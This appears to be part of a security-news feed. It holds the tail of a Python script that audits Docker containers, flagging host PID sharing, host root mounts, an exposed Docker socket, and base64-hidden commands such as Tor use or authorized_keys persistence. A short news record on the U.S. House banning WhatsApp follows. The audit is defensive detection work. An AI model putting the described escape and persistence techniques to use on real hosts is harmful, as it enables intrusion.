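    if hc.get("PidMode") == "host":
        findings.append("shares host PID namespace")
    cmd = " ".join(cfg.get("Cmd") or [])
    script = cmd + "\n" + decode_inline_base64(cmd)
    kws = sorted({m.group(0).lower() for m in SUSPECT_CMD.finditer(script)})
    if kws:
        findings.append("suspicious command content: " + ", ".join(kws))
    return findings


def audit_all(containers) -> dict:
    """Container name -> findings, for containers with at least one finding."""
    report = {}
    for c in containers:
        f = audit_container(c)
        if f:
            report[c["Name"]] = f
    return report


if __name__ == "__main__":
    for name, f in audit_all(CONTAINERS).items():
        print(name)
        for line in f:
            print("   -", line)
```

The nginx container, with a read-only bind of a web root, produces no findings; the attacker-style container is flagged for the host root mount and for the decoded stage revealing Tor and an authorized_keys write, which is the persistence step the report describes. The third record shows the same audit catching a different but equally dangerous shape: a privileged container holding the Docker socket.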
2025-06-24 09:24:19 thehackernews MISCELLANEOUS U.S. House Prohibits WhatsApp Use on Government Devices
The U.S. House of Representatives has banned WhatsApp on all House-issued devices used by congressional staff over security and data-protection concerns. The decision follows the House Chief Administrative Officer (CAO) classifying WhatsApp as a "high-risk" application, citing a lack of transparency about how it protects user data, the absence of encryption for stored data, and the resulting security risk. Meta, which owns WhatsApp, disputes this: communications director Andy Stone said all messages are end-to-end encrypted by default, argued that the app offers stronger security than some of the apps on the approved list, and pointed to its wide use among members and staff. The CAO's recommended alternatives are Microsoft Teams, Amazon's Wickr, Signal, and Apple's iMessage and FaceTime. WhatsApp joins TikTok, OpenAI's ChatGPT and DeepSeek on the list of apps the House has banned. Separately, WhatsApp has begun showing advertisements, a change the company says does not compromise user privacy.